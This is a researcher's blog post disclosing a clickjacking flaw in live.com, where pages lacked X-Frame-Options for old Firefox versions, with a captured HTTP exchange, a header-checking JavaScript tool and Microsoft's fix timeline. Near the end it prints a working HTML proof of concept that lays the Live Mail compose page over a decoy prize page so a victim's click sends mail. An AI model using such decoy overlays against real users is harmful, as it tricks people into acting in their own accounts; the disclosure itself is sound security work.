UI redress attack on live.com (affected all pages).

April 17, 2014

On 7/29/13 I reported a Live.com X-Frame-Options (XFO) vulnerability to the Microsoft Security team; their investigation has finally reached its conclusion and the bug is fixed. So here are the details of the bug and the timeline of the fix. A year ago, over a weekend, I started digging into MS services for bugs, and this vulnerability seemed the most interesting one to share on Garage4Hackers.

The timeline of the investigation of the bug: July 29, 2013 – April 16, 2014.

[Image attachment: msresponse.jpg]

The interesting part of the vulnerability: all pages were protected against UI redressing attacks, and while testing I normally test an application on all browsers. The weird part comes here: I was able to iframe all the pages of Live.com, including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 through Mozilla Firefox 6. On Chrome and on other browsers the XFO protection was working perfectly on all pages.

Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis by David Rude II aka Bannedit.
Note: Have a look at the same vulnerability on Facebook Application Installing.

Obviously, you must be wondering why this is happening with Mozilla. After doing some research and consulting with the G4H team, I concluded it may be an issue with the Gecko engine. The test environment was Windows 7 and Ubuntu 10, 11 and 12.
Note: If you have stumbled upon the same issue with Gecko, then please reply on this thread.

Check out the following request and response: the X-Frame-Options header is missing for Gecko/20120306 Firefox/3.6.28 through Firefox 6. Note that the header is absent from the server's response itself for this User-Agent (the capture below is what the server returned), so it is not a case of the browser receiving the header and ignoring it.

Code:
        https://blu166.mail.live.com/m/?bfv=wm

        GET /m/?bfv=wm HTTP/1.1
        Host: blu166.mail.live.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Cookie:

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm; domain=.live.com; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie: domain=.live.com; path=/
        Set-Cookie: xidseq=7; domain=.live.com; path=/
        Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1
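The quickest way to confirm a gap like this across browsers is to compare the response headers per User-Agent rather than trusting what any one browser renders. The following is an added example and not code from the original post: it parses a raw HTTP response, reports whether a cross-origin page could frame it (checking both X-Frame-Options and CSP frame-ancestors, the latter not yet common in 2013), and includes a sweep that refetches one URL under several User-Agent strings. The embedded response is the Live.com capture quoted above with the Set-Cookie lines trimmed; the "protected" response is constructed for contrast, and the sweep URL and User-Agent list are whatever you pass in.

```javascript
// Added example (not from the original post). Evaluate whether an HTTP
// response lets a cross-origin page frame it, then sweep one URL under
// several User-Agent strings to spot a per-UA gap. Node.js 18+ (global fetch).

// Parse the header section of a raw HTTP/1.1 response into a map keyed by
// lowercase header name. Repeated headers (Set-Cookie) are joined with ', '.
function parseHeaders(raw) {
  const headers = Object.create(null);
  const lines = raw.replace(/\r\n/g, '\n').split('\n');
  for (const line of lines.slice(1)) {   // lines[0] is the status line
    if (line.trim() === '') break;       // blank line ends the header section
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
  }
  return headers;
}

// Decide whether an attacker-controlled origin could put this response in an
// <iframe>. CSP frame-ancestors wins where present; otherwise X-Frame-Options.
// Returns { framable, xfo, frameAncestors, reason }.
function framingProtection(raw) {
  const h = parseHeaders(raw);
  const xfo = h['x-frame-options'] ? h['x-frame-options'].trim().toUpperCase() : null;
  const csp = h['content-security-policy'] || '';
  const m = /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(csp);
  const frameAncestors = m ? m[1].trim() : null;

  if (frameAncestors !== null) {
    // 'none' and 'self' both keep a foreign origin out; anything else lets
    // at least the listed origins frame the page.
    const sources = frameAncestors.split(/\s+/);
    const framable = !sources.every((s) => /^'(none|self)'$/i.test(s));
    return { framable, xfo, frameAncestors, reason: 'CSP frame-ancestors ' + frameAncestors };
  }
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { framable: false, xfo, frameAncestors, reason: 'X-Frame-Options ' + xfo };
  }
  if (xfo !== null) {
    // ALLOW-FROM and misspelled values are ignored by most browsers.
    return { framable: true, xfo, frameAncestors, reason: 'unsupported X-Frame-Options value: ' + xfo };
  }
  return { framable: true, xfo, frameAncestors, reason: 'no framing protection header' };
}

// The 2013 Live.com response quoted in the post (Set-Cookie lines trimmed).
const LIVE_RESPONSE_2013 = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'Content-Encoding: gzip',
  'Vary: Accept-Encoding',
  'Server: Microsoft-IIS/7.5',
  'P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"',
  'X-Powered-By: ASP.NET',
  'Content-Length: 3113',
  'Cache-Control: no-cache, no-store, must-revalidate, no-transform',
  '',
  '',
].join('\r\n');

// Constructed for contrast: what a protected response looks like.
const PROTECTED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'X-Frame-Options: DENY',
  "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'",
  '',
  '',
].join('\r\n');

// Live sweep: refetch one URL with each User-Agent and classify each response.
// Node's fetch lets us set User-Agent (browsers would refuse). Not called here.
async function sweepUserAgents(url, userAgents) {
  const out = [];
  for (const ua of userAgents) {
    const res = await fetch(url, { headers: { 'User-Agent': ua }, redirect: 'manual' });
    const lines = ['HTTP/1.1 ' + res.status];
    res.headers.forEach((value, name) => lines.push(name + ': ' + value));
    out.push({ ua, ...framingProtection(lines.join('\n') + '\n\n') });
  }
  return out;
}

console.log('live.com 2013:', framingProtection(LIVE_RESPONSE_2013));
console.log('protected    :', framingProtection(PROTECTED_RESPONSE));
```

To reproduce the author's cross-browser test without installing five browsers, call `sweepUserAgents(url, [...])` with the Firefox 3.6.28 string from the capture above alongside current Chrome and Firefox strings and diff the `framable` column; a URL that flips between true and false depending only on the User-Agent is the server making a per-UA decision.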

Here are some screenshots of basic operations on live.com (I would like to remind you, every page of live.com was vulnerable).

The page the attacker developed to attack the victim:

Composing Email :

Uploading Attachment :

Deleting Emails :

[Image: https://dl.dropboxusercontent.com/u/18007092/ms-click4.png]

HTML PoC, which I sent to the MS Security Team:

Code:
<!DOCTYPE html>
<html>
<!-- Quickly developed PoC, for testing purposes -->
<!-- Visit Garage4hackers.com -->
<head>
	<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
	<style>
		/* The framed Live.com compose page is laid over the decoy page. */
		iframe {
		  width:800px;
		  height:800px;
		  position:absolute;
		  top:0; left:0;
		  filter:alpha(opacity=50); /* old IE; in real life opacity=0 */
		  opacity:0.5;              /* half-transparent here so the overlap stays visible */
		}
	</style>
</head>
<body>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, you will win Bhag Milkha Bhag T-shirts.</b></center>

    <!-- Target page, with the recipient pre-filled through the to= parameter -->
    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
    <!-- Decoy link placed under the compose page's Send button; z-index keeps it beneath the iframe -->
	<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

</body>
</html>

Let me know if you have any questions about this bug.

– [S]

We Provide Penetration Testing
